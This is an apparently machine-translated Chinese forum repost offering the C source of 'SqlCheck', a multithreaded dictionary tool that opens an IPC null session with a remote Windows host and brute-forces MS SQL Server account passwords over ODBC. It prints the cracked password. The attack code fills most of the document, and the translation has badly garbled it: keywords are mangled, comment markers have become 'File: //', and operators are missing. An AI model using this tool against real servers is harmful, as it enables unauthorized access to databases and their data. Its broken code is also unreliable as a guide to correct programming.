Remote Detection MS SQL Server Account Security

zhaozj2021-02-08  238

ODBC is a referusion of open data interconnectivity, which is a unified interface standard for remote access databases (mainly relational databases). The actual application under ODBC is a database access library, which provides a set of ODBC API functions that can be provided to the programmer. For programmers, the ODBC API function set is actually equal to a dynamic connection library (DLL) set that can be used directly in the application. An application calls the ODBC API function to perform the application of the database, and the work process is generally complicated. One of the methods is probably the following steps: <1> Start the ODBC database application. <2> Establish IPC Session with the server. <3> Creating a Environment Handle for Database Applications. <4> Create a connection handle. <5> Connect the data source. <6> Create a statement handle. <7> performs SQL operations by the statement handle created by the previous step. <8> Release the clause handle. <9> To perform multiple this SQL operation, cycle step 6-8. <10> Disconnect the connection to the database. <11> Release the connection handle. <12> Release the environment handle. <13> Disconnect IPC Session. <14> The program ends. The whole process of remote detection MS SQL Server account password is described below with an example.

/ ************************************************** ********* Module Name: SqlCheck.cdate: 2000.12.14web: www.patching.netNotices: Copyright (c) Eyas

*********************************************************** ******** /

#include

#include

#include

#include

#include

#include

#include

#include

File: / / Define global variables

Char Dict [20000] [40], // Password Dictionary

Username [40], // username

Target [40], // Target server

Passwd [40]; // The correct password has been detected

INT TOTAL = 0; // Dictionary quantity

Bool cracked = false; // This value is true when the detection password is successful

Handle HSemaphore, // Beacon kernel object

HEVENT; / / Event kernel object

LONG MAXTHREADS, / / ​​Maximum number of threads

ActiveThreads; // Active thread number

Void usage (char * pragname)

{

Printf ("/ NPOWER by Eyas

"

"/nhttp://www.patching.net"

"/ N2000 / 12/14"

"/ n / nusage:% s

"

"/ NEXAMPLE:% S 192.168.0.1 Sa c: //pwd.dic 50 / n", pragname, prgname;

Return;

}

Int Readdic (Char * DIC)

{

File * fp;

CHAR TMP [40];

File: // Open a dictionary file

IF ((fp = fopen (DIC, "R")) == NULL)

{

Printf ("/ ncan't open% s", DIC);

Return 1;

}

While (! feof (fp))

{

File: // Read data to temporary variables

IF (FGETS (TMP, 40, FP) == NULL)

Break;

File: // Remove the last data read from the file [Live Symbol]

STRNCPY (DICT [TOTAL], TMP, STRLEN (TMP) -1); Total ;

IF (Total> = 19999)

Break;

}

Fclose (fp);

Return 0;

}

Int connipc (char * remoteename)

{

NetResource NR;

DWORD flags = connect_update_profile;

Tchar rn [30] = "",

LN [5] = ""

STRCAT (RN, Remotename);

STRCAT (RN, "// IPC $");

nr.dwtype = resourcetype_disk;

nr.lplocalname = (lptstr) & ln;

nr.lpremotename = (lptstr) & rn;

nr.lpprovider = null;

IF (WnetdConnection2 (& NR, (LPSTR) ", (LPSTR)" "", FLAGS) == NO_ERROR)

{

Return 0;

}

Else

{

Return 1;

}

}

int DelIPC (char * RemoteName) {DWORD ret; TCHAR lpName [30] = ""; strcat (lpName, RemoteName); strcat (lpName, "// ipc $"); ret = WNetCancelConnection2 (lpName, CONNECT_UPDATE_PROFILE, TRUE); IF (RET == NO_ERROR) {RETURN 0;} else {return 1;}} DWORD WINAPI SQLCHECK (PVOID PPWD) {file: // Define local variable char szbuffer [1025]; char * pwd; sword swstrlen; sqlhdbc HDBC; SQLHANDLE HENV; SQLRETURN RETCODE; // ODBC API Run Run Run Value Schar ConnsTr [200]; / / Connection Database String Long PreviousCount; File: // Acquired Password PWD = (CHAR *) PPWD; File: / / Construct Connection Database Character Sprintf (Connstr, "Driver = {SQL Server}; server =% s; UID =% S; PWD =% S; Database = Master", target, username, pwd); File: // Puts Conntr); __ try {file: // Create a database application environment handle if (SQLALLOCHANDLE_ENV, SQL_NULL_HANDLE, & HENV)! = SQL_SUCCESS) {Printf ("/ Nallocate Environment Handle Failed./N"; }xitprocess(1); file: // set ODBC version environment if (! SQLSetEnvAttr (henv, SQL_ATTR_ODBC_VERSION, (SQLPOINTER) SQL_OV_ODBC3, SQL_IS_INTEGER) = SQL_SUCCESS) {printf ( "/ nSet the ODBC version environment attribute failed./n");SQLFreeHandle(SQL_HANDLE_ENV, henv EXITPROCESS (1);} file: // creation Connection handle if (! (Retcode = SQLAllocHandle (SQL_HANDLE_DBC, henv, (SQLHDBC FAR *) & hdbc)) = SQL_SUCCESS) {printf ( "/ nAllocate connection handle failed./n");SQLFreeHandle(SQL_HANDLE_ENV, henv); ExitProcess (1 );} file: // data source connection retcode = SQLDriverConnect (hdbc, NULL, ConnStr, strlen (ConnStr), szBuffer, sizeof (szBuffer), & swStrLen, SQL_DRIVER_COMPLETE_REQUIRED); if (retcode = SQL_SUCCESS && retcode = SQL_SUCCESS_WITH_INFO) {!! file: // connection fails, the function terminates file: // printf ( "/ nCouldn't connect to% s MSSQL server./n",target);}else{file:// remote MSSQL Server database connection success Cracked = TRUE Strncpy (Passwd, PWD, SIZEOF (PASSWD)); File: // Disconnects SqldisConnect (HDBC);

}}} // end of tyr__finally {file: // Release connection handle SQLFreeHandle (SQL_HANDLE_DBC, HDBC); File: // Release Environment Handle SQLFreeHandle (SQL_HANDLE_ENV, HENV); File: // Increment for the current number of beacons, 1, And get the original value of the original value ReleaseSemaphore (HSemaphore, 1, & prep); file: // Calculate the current active thread number ActiveThreads = maxthreads-previouscount-1; file: //printf ("/ nactivethreads ->% d." , Activethreads); file: // If the number of active thread is 0, then change the event kernel object hevent to a notified state, the program ends if (activethreads == 0) {setEvent (hEvent);}} // end of finallyreturn 0 } int Main (int Argc, char ** argv) {handle hthread; // thread handle DWORD DWTHREADID, DWRET; INT i = 0, err = 0; clock_t start, end; // Start and end time Double Duration; if (argc! = 5) {usage (argv [0]); return 1;} file: // get the target address, user name STRNCPY (Target, Argv [1], SIZEOF (Target)); STRNCPY Username, Argv [2], SIZEOF (UserName)); File: / / A maximum number of threads entered and checks user input Maxthreads = atol (Argv [4]); if ((Maxthreads> 100) || (Maxthreads <1) ) {usage (argv [0]); return 1;} file: // read words in the dictionary to memory in memory (READIC (Argv [3])! = 0) Return 1; file: // with the target machine Established IPC Sessionif (Connipc (Argv [1])! = 0) {Printf ("/ Ncan't Built IPC Null Session!"); Return 1;} else {Printf ("/ NBUILT IPC NULL Sessio n success! / n ");} File: // Create a bezel kernel object, the maximum number of resources, and the number of resources that can be used is maxthreadshsemaphore = createMaphseMaphore = CreateSemaphore (null, maxthreads, maxths, null); if (HSemaphore == null) {Printf ("/ ncreateSemaphore () failed.errorcode:% d.", getLastError ()); return 1;} file: // Create an event kernel object [Artificial reset, the initial state is not notified] HEVENT = CREATEEVENT (NULL , True, false, null; if (hent == null) {printf ("/ ncreateEvent () Failed.errorCode:% D.", GetLastError ()); CloseHandle (HSEMaphore); Return 1;} file: // Start timing start = clock (); file: // Start establishing a thread detection password for (i = 0; i {

File: / / The detection password is successfully jumped out of this cycle

IF (cracked == true)

Break;

File: // Display progress information

Printf ("/ N [% D /% D]% S ->% S ->% S", I 1, Total, Target, User, DICT [i]); File: // Create thread

Hthread = CreateThread (NULL, 0, SQLCHECK, (PVOID) & DICT [I], 0, & DWTHREADID

File: // Process the situation of creating thread errors

IF (hthread == null)

{Err ; MessageBox (Null, "Thread Error", "Error", MB_OK); if (Err> = 50) Break;} closehandle (hthread); Sleep (10); File: // Wait for the label kernel object notification, The number of available resources is greater than 0, continue to create threads, equal to 0 threads enter the waiting state WaitForsingleObject (HSEMaphore, Infinite);} file: // Wait for the event kernel object notification, you will wait 3 minutes dwret = WaitForsingleObject (HEVENT, 180000); switch (HEVENT, 180000); Switch DWRET) {CASE WAIT_OBJECT_0: Printf ("/ Nall Thread Done."); Break; Case Wait_Timeout: Printf ("/ Nwait Time Out.exit."); Break; Case Wait_Failed: Printf ("/ NWAITFORSINGLEOBJECT () Failed." Break;} file: // Disconnect the IPC SessionDelipc (Target) of the target machine; file: // Detecting password after successful return information if (cracked == true) Printf ("/ n / nsuccess!% s SQL Server user [% s] passwd is [% s]. ", Target, username, passwd; file: // end End = clock (); file: // conversion time format duration = (double) START) / clocks_per_sec; file: // Displays the time printf used ("/ n / ncomplete.use% 2.1f seconds./n", duration); Return 0;} The program is compiled in the Windows 2000, VC 6.0 environment.

转载请注明原文地址:https://www.9cbs.com/read-2029.html

New Post(0)